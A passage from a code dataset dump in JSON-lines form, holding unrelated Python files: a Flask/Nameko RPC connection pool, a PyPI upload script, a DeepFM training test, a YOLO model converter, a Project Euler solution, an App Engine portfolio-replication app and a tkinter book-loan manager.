downloaded of a total of \"+ str(nseStockListLength)+\" Stocks \")\nnseStockPrices.close()\nengine.execute(enable_sql)\nengine.dispose()\nerrorLog.close()\n","sub_path":"old/stockHistory_adhoc.py","file_name":"stockHistory_adhoc.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"509043824","text":"def fibb():\n a=0\n b=1\n while True:\n yield a\n # print(a)\n net=a+b\n a=b\n b=net\n\na=iter(fibb())\n\nfor i in range(20):\n print(next(a))\n\n\n\n","sub_path":"Firstproject/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"547834119","text":"from __future__ import absolute_import, unicode_literals\n\nimport re\n\nimport six\nfrom flask import g\nfrom nameko.standalone.rpc import ClusterRpcProxy\n\nfrom .connection_pool import ConnectionPool\nfrom .errors import (\n BadConfigurationError,\n ClusterNotConfiguredError\n)\n\n\nclass PooledClusterRpcProxy(object):\n\n _pool = None\n _config = None\n\n def __init__(self, config=None):\n if config:\n self.configure(config)\n\n def configure(self, config):\n if not config.get('AMQP_URI'):\n raise BadConfigurationError(\n \"Please provide a valid configuration.\")\n\n self._config = config\n self._pool = ConnectionPool(\n self._get_nameko_connection,\n initial_connections=config.get('INITIAL_CONNECTIONS', 2),\n max_connections=config.get('MAX_CONNECTIONS', 8),\n recycle=config.get('POOL_RECYCLE')\n )\n\n def _get_nameko_connection(self):\n proxy = ClusterRpcProxy(\n self._config,\n timeout=self._config.get('RPC_TIMEOUT', None)\n )\n return proxy.start()\n\n def get_connection(self):\n if not self._pool:\n raise ClusterNotConfiguredError(\n \"Please configure your cluster beore requesting a connection.\")\n return self._pool.get_connection()\n\n def release_connection(self, connection):\n return self._pool.release_connection(connection)\n\n\nclass LazyServiceProxy(object):\n def __init__(self, get_connection, service):\n 
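# Sketch of the assumed contract: get_connection is a zero-argument callable that returns\n        # a live cluster proxy (e.g. LazyServiceProxy(lambda: pool.get_connection(), 'mailer')\n        # for a hypothetical 'mailer' service). Nothing connects here; the first attribute\n        # access in __getattr__ below acquires the connection on demand.\n        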
self.get_connection = get_connection\n self.service = service\n\n def __getattr__(self, name):\n return getattr(getattr(self.get_connection(), self.service), name)\n\n\nclass FlaskPooledClusterRpcProxy(PooledClusterRpcProxy):\n def __init__(self, app=None, connect_on_method_call=True):\n self._connect_on_method_call = connect_on_method_call\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n config = dict()\n for key, val in six.iteritems(app.config):\n match = re.match(r\"NAMEKO\\_(?P.*)\", key)\n if match:\n config[match.group('name')] = val\n self.configure(config)\n\n self._connect_on_method_call = config.get(\n 'NAMEKO_CONNECT_ON_METHOD_CALL',\n self._connect_on_method_call\n )\n\n app.teardown_appcontext(self._teardown_nameko_connection)\n\n def get_connection(self):\n connection = getattr(g, '_nameko_connection', None)\n if not connection:\n connection = super(\n FlaskPooledClusterRpcProxy, self).get_connection()\n g._nameko_connection = connection\n return connection\n\n def _teardown_nameko_connection(self, exception):\n connection = getattr(g, '_nameko_connection', None)\n if connection is not None:\n self.release_connection(connection)\n\n def _get_service(self, service):\n if self._connect_on_method_call:\n return LazyServiceProxy(lambda: self.get_connection(), service)\n else:\n return getattr(self.get_connection(), service)\n\n def __getattr__(self, name):\n return self._get_service(name)\n\n def __getitem__(self, name):\n return self._get_service(name)\n","sub_path":"flask_nameko/proxies.py","file_name":"proxies.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315381758","text":"import os\nimport shutil\nfrom yolk.pypi import CheeseShop\n\nPACKAGE_NAME = 'flask-swagger-generator'\n\n\ndef get_latest_version_number(package_name):\n pkg, all_versions = CheeseShop().query_versions_pypi(package_name)\n if len(all_versions):\n return all_versions[0]\n return None\n\n\nif __name__ == \"__main__\":\n import sys\n\n sys.path.append('../')\n\n from flask_swagger_generator import get_version\n released_version = get_latest_version_number(PACKAGE_NAME)\n\n if released_version != get_version():\n os.chdir(\"../\")\n\n # Remove distribution directory if exists\n if os.path.isdir('dist'):\n shutil.rmtree('dist')\n\n os.system(\"python setup.py sdist bdist_wheel\")\n os.system(\"twine upload -r {} dist/*\".format(PACKAGE_NAME))\n os.system(\"twine upload -p $pipy_password -u $pipy_username dist/*\")\n","sub_path":"ci/upload_package.py","file_name":"upload_package.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61618740","text":"import numpy as np\nimport geopandas as gpd\n\nfrom pyinterpolate.data_processing.data_transformation.get_areal_centroids import get_centroids\n\n\ndef prepare_areal_shapefile(areal_file_address, id_column_name=None, value_coulmn_name=None,\n geometry_column_name='geometry', dropnans=True):\n \"\"\"\n Function prepares areal shapefile for processing and transforms it into numpy array. 
Function returns\n two lists.\n :param areal_file_address: (string) path to the shapefile with areal data,\n :param id_column_name: (string) id column name, if not provided then index column is treated as the id,\n :param value_coulmn_name: (string) value column name, if not provided then all values are set to nan,\n :param geometry_column_name: (string) default is 'geometry',\n :param dropnans: (bool) if true then rows with nans are dropped,\n :return: areal_array: (numpy array) [area_id, area_geometry, centroid coordinate x, centroid coordinate y, value]\n \"\"\"\n\n shapefile = gpd.read_file(areal_file_address)\n cols_to_hold = list()\n\n # Prepare index column\n if id_column_name is None:\n shapefile['id'] = shapefile.index\n cols_to_hold.append('id')\n else:\n cols_to_hold.append(id_column_name)\n\n # Prepare geometry column\n cols_to_hold.append(geometry_column_name)\n\n # Prepare value column\n if value_coulmn_name is None:\n shapefile['vals'] = np.nan\n cols_to_hold.append('vals')\n else:\n cols_to_hold.append(value_coulmn_name)\n\n # Remove unwanted columns\n gdf = shapefile.copy()\n for col in gdf.columns:\n if col not in cols_to_hold:\n gdf.drop(labels=col, axis=1, inplace=True)\n\n # Set order of columns\n gdf = gdf[cols_to_hold]\n\n # Remove rows with nan's\n if dropnans:\n gdf.dropna(axis=0, inplace=True)\n\n # Extract values into numpy array\n areal_array = gdf.values\n\n # Get areal centroids\n centroids = [get_centroids(x) for x in areal_array[:, 1]]\n centroids = np.array(centroids)\n\n # Combine data into areal dataset\n areal_dataset = np.c_[areal_array[:, :2], centroids, areal_array[:, -1]]\n\n return areal_dataset\n","sub_path":"pyinterpolate/data_processing/data_preparation/prepare_areal_shapefile.py","file_name":"prepare_areal_shapefile.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"609828684","text":"import pandas as pd\nfrom sklearn.metrics import log_loss, roc_auc_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\n\nfrom deepctr.models import *\nfrom deepctr.feature_column import SparseFeat, DenseFeat, get_feature_names\n\nif __name__ == \"__main__\":\n data = pd.read_csv('/tmp/data/small_train.csv')\n # data = pd.read_csv('/tmp/data/avazu_data_100w_FE.csv')\n # train = data\n # test = input_test[input_test['day'] >= 29]\n # sparse_features = ['C' + str(i) for i in range(1, 27)]\n # dense_features = ['I' + str(i) for i in range(1, 14)]\n\n # sparse_features = ['C1', 'banner_pos', 'site_category', 'app_category',\n # 'device_type', 'device_conn_type', 'C18', 'hour', 'device_model','site_id']\n #\n # dense_features = [ 'site_domain', 'app_id', 'app_domain', 'device_ip',\n # 'C14', 'C17', 'C19', 'C20', 'C21']\n\n\n sparse_features = ['C1', 'banner_pos', 'site_category', 'app_category',\n 'device_type', 'device_conn_type', 'C18', 'hour', 'is_device', 'C_pix', 'C_site_id',\n 'C_site_domain', 'C_app_id', 'C_app_domain', 'C_device_ip',\n 'C_device_model', 'C_C14', 'C_C17', 'C_C19', 'C_C20', 'C_C21']\n\n data[sparse_features] = data[sparse_features].fillna('-1', )\n # data[dense_features] = data[dense_features].fillna(0, )\n target = ['click']\n\n # 1.Label Encoding for sparse features,and do simple Transformation for dense features\n for feat in sparse_features:\n lbe = LabelEncoder()\n data[feat] = lbe.fit_transform(data[feat])\n # mms = MinMaxScaler(feature_range=(0, 1))\n # data[dense_features] 
= mms.fit_transform(data[dense_features])\n\n # 2.count #unique features for each sparse field,and record dense feature field name\n\n # fixlen_feature_columns = [SparseFeat(feat, vocabulary_size=data[feat].nunique(), embedding_dim=4)\n # for i, feat in enumerate(sparse_features)] + [DenseFeat(feat, 1, )\n # for feat in dense_features]\n fixlen_feature_columns = [SparseFeat(feat, vocabulary_size=data[feat].nunique(), embedding_dim=4)\n for i, feat in enumerate(sparse_features)]\n\n dnn_feature_columns = fixlen_feature_columns\n linear_feature_columns = fixlen_feature_columns\n\n feature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\n # 3.generate input data for model\n\n train, test = train_test_split(data, test_size=0.2, random_state=2020)\n train_model_input = {name: train[name] for name in feature_names}\n test_model_input = {name: test[name] for name in feature_names}\n\n # 4.Define Model,train,predict and evaluate\n model = DeepFM(linear_feature_columns, dnn_feature_columns, task='binary')\n model.compile(\"adam\", \"binary_crossentropy\",\n metrics=['binary_crossentropy'], )\n\n history = model.fit(train_model_input, train[target].values,\n batch_size=256, epochs=10, verbose=2, validation_split=0.2, )\n pred_ans = model.predict(test_model_input, batch_size=256)\n print(\"test LogLoss\", round(log_loss(test[target].values, pred_ans), 4))\n print(\"test AUC\", round(roc_auc_score(test[target].values, pred_ans), 4))\n","sub_path":"test_dfm.py","file_name":"test_dfm.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645843699","text":"import argparse\nfrom yolo_to_onnx import yolo_to_onnx\nfrom onnx_to_tensorrt import onnx_to_tensorrt\n \n \nparser = argparse.ArgumentParser()\nparser.add_argument(\"--weights\", default=\"yolov4.weights\",\n help=\"yolo weights path\")\nparser.add_argument(\"--config_file\", default=\"yolov4.cfg\",\n help=\"path to config file\")\nparser.add_argument(\"--data_file\", default=\"coco.names\",\n help=\"path to data file\")\n\nparser.add_argument('-v', '--verbose', action='store_true',\n help='enable verbose output (for debugging)')\nparser.add_argument('--int8', action='store_true',\n help='build INT8 TensorRT engine')\nparser.add_argument('--dla_core', type=int, default=-1,\n help='id of DLA core for inference (0 ~ N-1)')\nargs = parser.parse_args()\n\nonnx_file_path = yolo_to_onnx(args.weights, args.config_file, args.data_file)\nonnx_to_tensorrt(onnx_file_path, args.config_file, args.data_file, args.int8, args.dla_core, args.verbose)","sub_path":"prepared_models/prepare_model.py","file_name":"prepare_model.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"529796481","text":"import math, itertools\r\nfrom tqdm import tqdm\r\n\r\n#streak(n) > 1 implies 2|n+1 or n % 2 = 1 so n = 1 mod 2\r\n#streak(n) > 2 implies 2|n+1 and 3|n+2 or n = 1 mod 6\r\n#streak(n) > 3 implies 2|n+1 and 3|n+2 and 4|n+3 or n = 1 mod 12\r\n#streak(n) > 4 implies ... and 5|n+4 or n = 1 mod 60\r\n#streak(n) > 5 implies ... and 6|n+5 or n = 1 mod 60\r\n#streak(n) > 6 implies ... 
and 7|n+6 or n = 1 mod 420\r\n#So streak(n)=k is equivalent to n = 1 mod lcm(1,2,...,k) but n != 1 mod (1,2,...,k,k+1)\r\n\r\ndef lcmList(inputList):\r\n total = 1\r\n for l in inputList:\r\n total = (total*l)//(math.gcd(total,l))\r\n return total\r\n\r\ndef secondtry(a,N):\r\n # Number of elements below N which have streak a consist of all elements congruent to 1 mod lcm(1,2,3,...,a) without all elements congruent to 1 mod lcm(1,2,...,a,a+1)\r\n # There are 1+(N-1)//lcm(...a) such of the first (assuming a is not 1, in which case it's actually N-1) and 1+(N-1)//lcm(...a+1) of the second.\r\n # We avoid the issue with first=1 by subtracting off an additional 1 from N. Since the lcms never divide 4^n-2 except in very small cases we're trying to fix, things work out.\r\n first = lcmList([x for x in range(1,a+1)])\r\n second = (first * (a+1))//math.gcd(first,a+1)\r\n answer = (N-2)//first - (N-2)//second\r\n return answer\r\n\r\ndef problem601(upper):\r\n final = 0\r\n for i in range(1,upper+1):\r\n final += secondtry(i,4**i)\r\n return final\r\n\r\nprint(problem601(31))\r\n","sub_path":"601.py","file_name":"601.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"289512594","text":"import googlechart as gc\n\nimport logging\nimport cgi\nimport os\nimport datetime as dt\nfrom xml.dom import minidom\n\nfrom google.appengine.api import users\nfrom google.appengine.api import urlfetch\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\n\nBASE_CODES = ('TLT','SPY','EEM','USO','GLD')\nDATE_FORMAT = '%d/%m/%y'\n\nclass RunLogs(db.Model):\n runner = db.UserProperty()\n asset_code = db.StringProperty()\n query_path = db.LinkProperty()\n bquery_path = db.LinkProperty()\n holding_path = db.LinkProperty()\n backtest_path = db.LinkProperty()\n run_time = db.DateTimeProperty() \n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n\n runlogs_query = RunLogs.all().order('-run_time')\n runlogs = runlogs_query.fetch(10)\n\n if users.get_current_user():\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n template_values = {\n 'runlogs': runlogs,\n 'url': url,\n 'url_linktext': url_linktext,\n }\n\n path = os.path.join(os.path.dirname(__file__), 'index.html')\n self.response.out.write(template.render(path, template_values))\n\nclass Replicate(webapp.RequestHandler):\n def post(self):\n runlog = RunLogs()\n\n if users.get_current_user():\n runlog.runner = users.get_current_user()\n\n asset_code = self.request.get('asset_code')\n\n today = dt.datetime.now()\n end_date = today.strftime(DATE_FORMAT)\n start_year = today.year\n start_month = today.month - 1\n start_day = today.day\n if today.month == 1:\n start_year = today.year - 1\n start_month = 12\n start_date = dt.date(start_year, start_month, start_day).strftime(DATE_FORMAT)\n\n lb = []\n ub = []\n for item in BASE_CODES:\n lb.append(0.0)\n ub.append(1.0)\n\n urlstring = 'http://al8tross.appspot.com/resources/AssetReplicatorREST?' 
+ \\\n 'targetAsset=' + asset_code + '&' + \\\n 'baseAssets=' + \",\".join(BASE_CODES) + '&' + \\\n 'startDate=' + start_date + '&endDate=' + end_date + '&' + \\\n 'lowerbound=' + \",\".join(map(str, lb)) + '&' + \\\n 'upperbound=' + \",\".join(map(str, ub)) + '&' + \\\n 'periodicity=d&global=true&targetDim=' + str(len(BASE_CODES))\n\n #optimized = urllib.urlopen(urlstring)\n optimized = urlfetch.fetch(urlstring, deadline=10)\n \n optimized_parsed = minidom.parseString(optimized.content)\n codeList = optimized_parsed.getElementsByTagName(\"code\")\n weightList = optimized_parsed.getElementsByTagName(\"weight\")\n codes = []\n weights = []\n for code in codeList:\n codes.append(code.firstChild.data)\n\n for weight in weightList:\n weights.append(float(weight.firstChild.data))\n\n urlpath = gc.bar_chart(weights, codes)\n\n backtesturl = 'http://al8tross.appspot.com/resources/BacktestREST?' + \\\n 'stockCodes='+ asset_code + ',' + ','.join(BASE_CODES) + '&' + \\\n 'factorCodes=' + asset_code + '&' + \\\n 'targetModels=Weighted_Basket_0_' + '_'.join(map(str, weights)) + '&' + \\\n 'meanTarget=0&varTarget=0&skewTarget=0&' + \\\n 'startDate=' + start_date + '&endDate=' + end_date + '&' + \\\n 'nb_read=1&nb_bch=0&' + \\\n 'lowerbound=' + '0,' + ','.join(map(str, lb)) + '&' + \\\n 'upperbound=' + '1,' + ','.join(map(str, ub)) + '&' + \\\n 'periodicity=d'\n\n backtested = urlfetch.fetch(backtesturl, deadline=10)\n\n backtest_parsed = minidom.parseString(backtested.content)\n rowList = backtest_parsed.getElementsByTagName(\"row\")\n dataList = backtest_parsed.getElementsByTagName(\"data\")\n timeseries = [[0.0 for row in range(len(rowList) + 1)] for col in range(2)]\n timeseries[0][0] = 100\n timeseries[1][0] = 100\n for i in range(len(rowList)):\n timeseries[0][i + 1] = timeseries[0][i] * (1 + float(dataList.item(i * 2).firstChild.data))\n timeseries[1][i + 1] = timeseries[1][i] * (1 + float(dataList.item(i * 2 + 1).firstChild.data))\n\n backtestpath = gc.line_chart(timeseries, [asset_code, \"Basket\"])\n\n runlog.asset_code = asset_code\n runlog.query_path = db.Link(urlstring)\n runlog.bquery_path = db.Link(backtesturl)\n runlog.holding_path = db.Link(urlpath)\n runlog.backtest_path = db.Link(backtestpath)\n runlog.run_time = dt.datetime.now()\n\n runlog.put()\n\n self.redirect('/')\n\ndef main():\n logging.getLogger().setLevel(logging.INFO)\n application = webapp.WSGIApplication([('/', MainPage), ('/replicate', Replicate)], debug=True)\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mainscript.py","file_name":"mainscript.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"266176000","text":"import tkinter as tk\nimport pandas as pd\nimport os\nfrom treview import treview\nimport initizializers as init\nimport SearchInRepo as search\nimport datetime\nimport numpy as np\n#from initizializers import dataframe\n\ndef add_book(dataframe, dataframeLoan, variableString, filenameREPO):\n \n book_to_append = {}\n for key, value in variableString.items():\n book_to_append[key] = [value.get()]\n if key == init.SpecialVar[\"Title\"]:\n SpecialVarTitle = value.get()\n if key == init.SpecialVar[\"Author\"]: \n SpecialVarAuthor = value.get()\n if key == init.SpecialVar[\"Position\"]:\n SpecialVarPos = value.get()\n if key == \"Available\":\n book_to_append[key] = \"Yes\"\n \n \n if not init.dataframe[init.dataframe[init.SpecialVar[\"Position\"]].isin([SpecialVarPos])].empty :\n 
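# A non-empty match means another record already occupies this shelf position, so\n        # refuse the insert and warn the user rather than storing two books in one slot.\n        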
init.warning(\"There is already a book in that position.\\nIt's impossible that two book are in the same place.\\nMaybe you missed something?\")\n return None\n voidTesT = [values == [\"\"] for values in book_to_append.values()]\n if all(voidTesT):\n message = \"The fields cannot be all empty!!!\"\n init.warning(message)\n else:\n if SpecialVarTitle == \"\" and SpecialVarAuthor == \"\" and SpecialVarPos == \"\":\n message = \"You must add at least Title, Author and Position!!!\"\n init.warning(message)\n return None\n \n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n book_to_append = pd.DataFrame(book_to_append).dropna()\n dataframe = dataframe.append(book_to_append)\n dataframe = dataframe.astype(str)\n dataframe.to_csv(f, sep = \";\", index = False)\n \n with open(filenameREPO, 'r') as f:\n dataframe=pd.read_csv(filenameREPO, sep = \";\", encoding = \"latin1\")\n dataframe = dataframe.replace(np.nan, '', regex=True)\n dataframe = dataframe.astype(str)\n dataframe = dataframe.replace(np.nan, '', regex=True)\n \n init.dataframe = dataframe \ndef explore_repository(dataframe, variableString):\n \n TextWin = tk.Toplevel()\n TextWin.title(\"REPOSITORY RM MEXICO\")\n n_rows =1\n n_columns =1\n for i in range(n_rows):\n TextWin.grid_rowconfigure(i, weight =1)\n for i in range(n_columns):\n TextWin.grid_columnconfigure(i, weight =1)\n treview(TextWin, dataframe, variableString, 0,0,20,20)\n\ndef explore_loan_repository(dataframeLoan, StringOfRestitution):\n \n TextWin = tk.Toplevel()\n TextWin.title(\"REPOSITORY RM MEXICO\")\n treview(TextWin, dataframeLoan, StringOfRestitution,0,0,20,20)\n\n\ndef eliminateBook(dataframe, filenameREPO,variableString):\n \n for key, value in variableString.items():\n if key == init.SpecialVar[\"Position\"]:\n position = value.get()\n found_book = init.dataframe[init.dataframe[key]==position]\n \n init.dataframe = init.dataframe.drop(labels=found_book.index, axis=0)\n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n init.dataframe.to_csv(f, sep = \";\", index = False)\n \n\ndef loan_id_insert(dataframe, dataframeLoan, variableString,filenameREPO, filenameLOAN): \n \n for key, value in variableString.items():\n if key == init.SpecialVar[\"Position\"]:\n position = value.get()\n found_book = dataframe[dataframe[key]==position]\n message =\"\"\n for i in [init.SpecialVar[\"Title\"], init.SpecialVar[\"Author\"], init.SpecialVar[\"Position\"]]:\n message += str(dataframe[i].iloc[0]) + \" \"\n #message = found_book.to_string(index=False)\n loanWin = tk.Toplevel()\n loanWin.title(\"Loan\")\n info = tk.Label(loanWin, text = f\"you are loaning the book:\\n{message}\\n Insert the Id of receving\").grid(row=0, column=2,columnspan = 5, sticky = \"WE\", padx=10)\n \n Name = tk.StringVar()\n Room = tk.StringVar()\n Contact = tk.StringVar()\n Day = tk.StringVar()\n Month = tk.StringVar()\n Year = tk.StringVar()\n Day.set(\"DD\")\n Month.set(\"MM\")\n Year.set(datetime.date.today().year)\n n_rows =10\n n_columns =20\n for i in range(n_rows):\n loanWin.grid_rowconfigure(i, weight =1)\n for i in range(n_columns):\n loanWin.grid_columnconfigure(i, weight =1)\n \n name = tk.Label(loanWin, text = \"name and surname\").grid(row=1, column=0,columnspan=2)\n nameF = tk.Entry(loanWin, textvariable = Name).grid(row=1, column=2, columnspan=5, sticky = \"WE\", padx=10)\n\n room = tk.Label(loanWin, text = \"room/adress\").grid(row=2, column=0, columnspan =2)\n roomF = tk.Entry(loanWin, textvariable = Room).grid(row=2, column=2, columnspan=5, sticky = \"WE\", 
padx=10)\n \n room = tk.Label(loanWin, text = \"Contact\").grid(row=3, column=0, columnspan =2)\n roomF = tk.Entry(loanWin, textvariable = Contact).grid(row=3, column=2, columnspan=5, sticky = \"WE\", padx=10)\n \n dateLab = tk.Label(loanWin, text = \"Date\\nrestitution\").grid(row=4, column=0, columnspan=1, padx=1)\n dateEntry1= tk.Entry(loanWin, textvariable = Day, width=5).grid(row=4, column=2, columnspan =1, sticky = \"WE\", padx=1)\n \n dateLab = tk.Label(loanWin, text = \"-\").grid(row=4, column=4, columnspan = 1,padx=1)\n dateEntry1= tk.Entry(loanWin, textvariable = Month, width=5).grid(row=4, column=4, columnspan = 1, sticky = \"WE\", padx=1)\n \n dateLab = tk.Label(loanWin, text = \"-\").grid(row=4, column=5, columnspan=1, padx=1)\n dateEntry1= tk.Entry(loanWin, textvariable = Year, width=5).grid(row=4, column=6, columnspan=1, sticky = \"WE\", padx=1)\n \n \n take = tk.Button(loanWin, text = \"insert\", command=lambda: loan_the_book(found_book,Name, Room,Contact,Day, Month, Year,loanWin,dataframe, dataframeLoan, variableString, filenameREPO, filenameLOAN)).grid(row = 5,column=1, padx = 10, pady=30, columnspan = 3)\n \ndef loan_the_book(found, Name, Room,Contact, Day, Month, Year,win, dataframe, dataframeLoan, variableString, filenameREPO, filenameLOAN):\n \n nome = Name.get() \n adress = Room.get()\n contact = Contact.get()\n day = Day.get()\n month = Month.get()\n year = Year.get()\n Name.set(\"\")\n Room.set(\"\")\n Day.set(\"DD\")\n Month.set(\"MM\")\n Year.set(\"\")\n today = datetime.date.today()\n \n for column in found.columns:\n if column == init.SpecialVar[\"Title\"]:\n SpecialVarTitle = found[column][found.index]\n if column == init.SpecialVar[\"Author\"]: \n SpecialVarAuthor = found[column][found.index]\n if column == init.SpecialVar[\"Position\"]:\n SpecialVarPos = found[column][found.index]\n today = f\"{today.day}-{today.month}-{today.year}\"\n book_to_append = {\"Keeper\": [nome], \"Adress\": [adress], \"Title\": SpecialVarTitle, \"Author\": SpecialVarAuthor, \"Position\" : SpecialVarPos, \"Contact\": [contact], \"Date of loan\" : [today], \"Date of restitution\" : [day+\"-\"+month+\"-\"+year]}\n \n book_to_append = pd.DataFrame(book_to_append)\n dataframeLoan = dataframeLoan.append(book_to_append)\n dataframeLoan[\"Date of restitution\" ] =pd.to_datetime(dataframeLoan[\"Date of restitution\" ])\n dataframeLoan=dataframeLoan.sort_values(by=\"Date of restitution\", ascending = False) \n with open(filenameLOAN, 'w', encoding = \"latin1\" ) as f:\n dataframeLoan.to_csv(f, sep = \";\", index = False)\n \n \n dataframe[\"Available\"][found.index] = \"No\"\n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n dataframe.to_csv(f, sep = \";\", index = False, encoding = \"latin1\")\n \n with open(filenameLOAN, 'r') as f:\n dataframeLoan = pd.read_csv(f, sep = \";\", encoding = \"latin1\")\n dataframeLoan = dataframeLoan.replace(np.nan, '', regex=True)\n dataframeLoan = dataframeLoan.astype(str) \n \n init.dataframeLoan = dataframeLoan\n win.destroy() \n\ndef restitution_win(dataframeLoan, dataframe, filenameREPO, filenameLOAN, StringOfRestitution): \n \n StringOfRestitution[\"Name\"] = tk.StringVar()\n StringOfRestitution[\"Adress\"]= tk.StringVar()\n StringOfRestitution[\"Title\"]= tk.StringVar()\n StringOfRestitution[\"Author\"] = tk.StringVar()\n StringOfRestitution[\"Position\"]= tk.StringVar()\n \n restWin = tk.Toplevel()\n restWin.iconbitmap('Seminario_RM.ico')\n name = tk.Label(restWin, text = \"name and surname\").grid(row=1, column=0)\n nameF = 
tk.Entry(restWin, textvariable = StringOfRestitution[\"Name\"] ).grid(row=1, column=1, sticky = \"WE\", padx=10)\n\n room = tk.Label(restWin, text = \"room/adress\").grid(row=2, column=0)\n roomF = tk.Entry(restWin, textvariable = StringOfRestitution[\"Adress\"]).grid(row=2, column=1, sticky = \"WE\", padx=10)\n \n pos = tk.Label(restWin, text = \"Position\").grid(row=3, column=0)\n search_field_position = tk.Entry(restWin, textvariable =StringOfRestitution[\"Position\"]).grid(row=3, column=1, sticky = \"WE\", padx=10)\n\n pos = tk.Label(restWin, text = \"Author\").grid(row=4, column=0)\n search_field_position = tk.Entry(restWin, textvariable =StringOfRestitution[\"Author\"]).grid(row=4, column=1, sticky = \"WE\", padx=10) \n\n title = tk.Label(restWin, text = \"Title\").grid(row=5, column=0)\n search_field_Title = tk.Entry(restWin, textvariable = StringOfRestitution[\"Title\"]).grid(row=5, column=1, sticky = \"WE\", padx=10)\n\n take = tk.Button(restWin, text = \"restitute\", command=lambda: resa(StringOfRestitution,restWin,dataframeLoan,dataframe, filenameREPO, filenameLOAN)).grid(row = 1,column=2)\n\ndef resa(StringOfRestitution,win, dataframeLoan, dataframe, filenameREPO, filenameLOAN, REMOTE = \"No\"):\n \n dfname = search.merging_search(StringOfRestitution[\"Name\"], \"Keeper\", init.dataframeLoan)\n dfroom = search.merging_search(StringOfRestitution[\"Adress\"], \"Adress\", init.dataframeLoan)\n dfposition = search.merging_search(StringOfRestitution[\"Position\"], \"Position\", init.dataframeLoan)\n dfTitle = search.merging_search(StringOfRestitution[\"Title\"], \"Title\", init.dataframeLoan)\n dfAuthor = search.merging_search(StringOfRestitution[\"Author\"], \"Title\", init.dataframeLoan)\n \n Resultsdf = dfTitle[dfTitle.isin(dfroom)].dropna()\n Resultsdf = Resultsdf[Resultsdf.isin(dfposition)].dropna()\n Resultsdf = Resultsdf[Resultsdf.isin(dfname)].dropna()\n \n init.dataframeLoan = init.dataframeLoan.drop(labels=Resultsdf.index, axis=0)\n \n with open(filenameLOAN, 'w', encoding = \"latin1\" ) as f:\n init.dataframeLoan.to_csv(f, sep = \";\", index = False)\n with open(filenameLOAN, 'r') as f:\n dataframeLoan = pd.read_csv(f, sep = \";\", encoding = \"latin1\") \n dataframeLoan = dataframeLoan.replace(np.nan, '', regex=True)\n dataframeLoan = dataframeLoan.astype(str) \n for key, values in init.variableString.items():\n if key == init.SpecialVar[\"Title\"]:\n indexes = dataframe[key]\n \n Index = indexes[indexes == Resultsdf[\"Title\"][Resultsdf.index[0]]].index.tolist() \n dataframe[\"Available\"][Index] = \"Yes\"\n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n dataframe.to_csv(f, sep = \";\", index = False)\n \n init.dataframe = dataframe\n init.dataframeLoan = dataframeLoan\n win.destroy()\n ","sub_path":"ActOnRepo.py","file_name":"ActOnRepo.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"348195321","text":"import sys\n\nBEDFILENAME = sys.argv[1]\r\nOUTPUTFILENAME = sys.argv[2]\nJITTERLIST = []\nfor i in range(3, len(sys.argv)):\n\t# Add each of the remaining arguments to the list of jitter lengths\n\tJITTERLIST.append(int(sys.argv[i]))\r\n\r\ndef jitterBed():\r\n\t# Make jittered versions of each regions for each shift in JITTERLIST\r\n\t# ASSUMES THAT JITTERS WILL NOT GO OFF CHROMOSOME ENDS\r\n\tbedFile = open(BEDFILENAME)\r\n\toutputFile = open(OUTPUTFILENAME, 'w+')\r\n\tfor line in bedFile:\r\n\t\t# Iterate through the regions and make the flanking regions 
